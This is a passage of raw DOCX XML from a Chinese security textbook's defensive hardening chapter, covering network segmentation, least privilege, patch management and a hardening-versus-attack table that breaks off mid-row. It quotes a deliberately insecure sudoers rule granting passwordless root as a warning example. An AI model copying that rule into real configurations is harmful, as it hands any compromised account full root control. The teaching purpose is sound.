          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会直接拦截来自非法子网的连接。即便攻击者控制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，也无法直接与数据库建立会话，必须突破应用服务器，大幅增加攻击成本并制造可检测的告警。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="346"/>
    <w:bookmarkStart w:id="347" w:name="管理接口的带外隔离"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">管理接口的带外隔离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络设备、服务器管理口（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IPMI、iLO、iDRAC）应放在专用的管理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，并通过堡垒机/跳板机进行访问，任何普通业务流量不得进入管理网段。这一措施专门防御利用默认口令、旧固件漏洞直接控制物理服务器的攻击路径。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="347"/>
    <w:bookmarkStart w:id="348" w:name="分段与检测的协同"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分段与检测的协同</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段强制流量经过少数“咽喉点”，这恰好是部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS/IPS（Snort/Suricata）的绝佳位置。回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署，所有跨段流量都能在核心交换机或防火墙处进行深层包检测，实现“分段即检测点”的架构。例如，即使内部某台主机被植入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理，其与外部控制器的异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道也会在穿越分段边界时被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则捕获。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="348"/>
    <w:bookmarkEnd w:id="349"/>
    <w:bookmarkStart w:id="353" w:name="最小权限least-privilege"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限（Least</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限原则贯穿系统、应用与人员三个维度，是预防提权和未经授权访问的基石。NIST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SP 800-53 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">控制项明确要求组织实现最小权限。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="350" w:name="用户运行级最小化"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户运行级最小化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统中，日常操作应使用普通用户账户，通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">临时提升权限。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置必须严格限制可提权的命令和参数，避免通配型授权。例如，如下配置是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">极其危险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的（②仅占位示意不当配置，非推荐）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user ALL=(ALL) NOPASSWD: ALL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者一旦获得该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的会话，即可无密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行任何命令，等同于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root。正确的做法是仅放行必要命令且要求密码验证，并禁止运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解释器。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="350"/>
    <w:bookmarkStart w:id="351" w:name="文件与服务级权限最小化"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件与服务级权限最小化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apache/Nginx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务的运行时账户（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data）不应拥有对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录的写权限，除非特定上传目录（且该目录需禁用脚本执行）。这直接阻止了攻击者通过文件上传漏洞（Ch11）写入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后直接运行的局面</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> —— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即使文件被上传到可写目录，由于执行权限被剥离，攻击仍需利用其他漏洞才能执行。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="351"/>
    <w:bookmarkStart w:id="352" w:name="容器虚拟机逃逸防御"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">容器/虚拟机逃逸防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在现代部署中，容器与虚拟机成为事实上的分段单元。最小权限原则同样适用于容器运行时的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capability </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --cap-drop=ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），防止容器内获得额外权限后逃逸至宿主机。此项与卷四</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的容器逃逸提权形成攻防对称。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="352"/>
    <w:bookmarkEnd w:id="353"/>
    <w:bookmarkStart w:id="356" w:name="补丁管理消除已知漏洞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">补丁管理：消除已知漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">补丁管理是应对已知漏洞（尤其是具有公开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的漏洞）最直接的手段。攻击者常用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块和自动化扫描器（Ch17、Ch5）高度依赖目标软件的版本号与已知漏洞指纹。延迟部署补丁等同于给攻击者预留了确定性通道。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="354" w:name="漏洞优先级与验证"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞优先级与验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不应盲目地“打所有补丁”，而应结合威胁情报与资产关键性定级。在授权实验室环境下，可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OpenVAS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具扫描靶机，识别缺失补丁列表，与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库交叉比对，确定修复优先级。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="354"/>
    <w:bookmarkStart w:id="355" w:name="补丁管理流程"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">补丁管理流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">建立软件清单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（SBOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">思想）：使用包管理器获取所有已安装包版本。例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rpm -qa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（②因发行版而异）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">配置自动安全更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对于非关键生产环境，可启用无人值守的安全更新（unattended-upgrades），但需先在测试环境确认兼容性，防止打补丁导致服务中断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内核补丁的在线应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在授权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机中，内核提权漏洞（Dirty</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> COW </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，Ch15）的防御必须依赖补丁或内核版本升级。执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查版本，对照已知漏洞数据库确定是否需要热升级或热补丁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">验证修复有效性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：打完补丁后，应重新运行漏洞扫描或利用验证（如尝试用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应模块）确认服务已不再受影响。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="355"/>
    <w:bookmarkEnd w:id="356"/>
    <w:bookmarkStart w:id="357" w:name="加固检查清单与攻防对照表"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加固检查清单与攻防对照表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下表抽取了本节核心加固项，并明确其在攻防对抗中防御的具体攻击类型，构成蓝队对前四卷攻击的“直接应答”。命令示例仅为占位②，真实执行需依据靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本与业务需求调整。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1147"/>
        <w:gridCol w:w="918"/>
        <w:gridCol w:w="2410"/>
        <w:gridCol w:w="1836"/>
        <w:gridCol w:w="1606"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">加固类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">加固项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">命令/配置示例（占位）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">防御的攻击技术</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">回指攻击章节</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">主机最小服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">关闭</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> telnet </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl disable --now telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">明文口令嗅探、弱口令爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch5 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">端口扫描，Ch6</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">欺骗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">主机最小服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">卸载无用的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> FTP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">apt purge vsftpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">匿名</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> FTP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">登录、文件上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ch5 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务探测，Ch11</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">文件上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">账户与认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
